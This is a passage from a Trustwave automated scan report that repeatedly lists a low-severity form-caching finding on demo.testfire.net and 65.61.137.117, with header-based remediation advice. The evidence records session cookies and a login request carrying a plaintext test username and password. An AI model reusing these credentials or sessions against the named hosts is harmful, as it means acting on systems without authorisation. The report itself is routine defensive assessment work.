JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 537 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net:8080/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 538 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 539 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
http://demo.testfire.net:8080/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 540 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 541 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 542 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net:8443/index.jsp?content=personal.htm
HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 543 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 544 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
http://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/index.jsp?content=personal.htm
No Caching Directives Found.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 545 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 546 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 547 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 548 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 549 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 550 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 551 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 552 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 553 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 554 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 555 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 556 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 557 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 558 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 559 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
http://65.61.137.117:8080/index.jsp?content=business.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 560 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 561 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 562 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 563 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 564 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 565 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 566 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 567 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://65.61.137.117:8080/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 568 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 569 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 570 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 571 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 572 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 573 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://65.61.137.117:8443/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 574 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 575 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117:8080/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 576 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 577 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 578 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://demo.testfire.net/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 579 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
